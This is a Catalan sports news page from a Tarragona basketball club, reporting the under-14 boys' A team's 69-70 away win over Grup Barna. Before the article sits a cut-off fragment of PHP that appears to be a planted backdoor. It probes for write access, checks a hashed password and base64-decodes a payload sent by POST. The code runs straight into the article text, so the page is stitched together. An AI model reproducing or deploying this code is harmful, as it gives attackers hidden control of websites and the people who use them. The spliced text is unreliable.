function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A guanya a la pista del Grup Barna en un final molt ajustat (69-70) - Tgn Bàsquet Club -

L’infantil masculí A guanya a la pista del Grup Barna en un final molt ajustat (69-70)

Updated: març 31, 2014

L’equip infantil masculí A del TGN Bàsquet va aconseguir la segona victòria en les tres últimes jornades en la fase A1 (la superior en la categoria infantil) després de derrotar el Grup Barna a domicili. Els nois que entrena Jordi Hernández van fer un inici de partit molt bo, amb gran concentració que els va permetre dominar en el marcador amb una certa claredat. Amb tot, un triple de mig camp dels locals amb el temps gairebé acabat va deixar la diferència en 7 punts (17-24). Els triples van ser el malson dels tarragonins perquè el Grup Barna en va encistellar 2 més en els primers 5 minuts del segon quart i, d’aquesta manera i per primera vegada en el partit, capgiraven el resultat. El partit va entrar en una dinàmica d’igualtat que es va trencar en l’últim període quan els visitants van trencar el matx. Amb tot, el Grup Barna no es va rendir, va marcar un parcial de 6-0 en els dos últims minuts i va desaprofitar un últim tir sobre la botzina que va fallar.